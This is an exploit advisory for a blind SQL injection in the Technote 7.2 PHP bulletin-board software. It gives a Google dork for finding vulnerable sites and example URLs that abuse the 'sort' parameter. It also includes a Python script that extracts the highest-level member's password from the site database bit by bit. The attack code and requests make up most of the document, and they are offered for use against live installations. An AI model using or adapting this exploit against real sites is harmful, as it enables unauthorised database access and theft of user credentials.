# Exploit Title: technote blind sql injection # Google Dork: inurl:/technote7/board.php?board= # Date: 2011.06.11 # Author: BlueH4G (http://blueh4g.org) # Software Link: http://www.technote.co.kr/php/technote1/board.php?board=consult&command=skin_insert&exe=insert_down_shop # Version: technote7.2 > * && Mysql 3.x < * # Tested on: Windows & Linux everything ============================================================================================================ vulnerability : blind sql injection with order by option. i could control align data with sort variable with <code>case</code>. blueh4g.org/technote7/board.php?board=freeboard&sort=(case(select 1=1) when true then no else uid end) asc# -> sort by <code>no</code> column. blueh4g.org/technote7/board.php?board=freeboard&sort=(case(select 1=2) when true then no else uid end) asc# -> sort by <code>uid</code> column. ============================================================================================================ exploit : #!/usr/bin/python #-*- coding: utf-8 -*- # coded by BlueH4G _http://blueh4g.org_ import urllib,re from time import sleep def main() : chk = re.compile("true_title") url_begin=" http://t.blueh4g.org/technote7/board.php?board=freeboard&sort=(case%20(" url_end=")%20when%20true%20then%20no%20else%20uid%20end)%20asc%20limit%200,1%23" result="result : " for spos in range(1,14): ch=0 for i in range(1,8) : sleep(0.05) query="select%20substr((select%20lpad(bin(ascii(substr(m_pass,"+str(spos)+",1))),7,0)%20from%20a_tn3_memberboard_list%20order%20by%20m_level%20desc%20limit%200,1),"+str(i)+",1)=1 data=urllib.urlopen(url_begin + query + url_end) text=data.read() if chk.search(text) : ch += 2**(7-i) result+=chr(ch) print result main() ============================================================================================================ -- ## BlueH4G ## |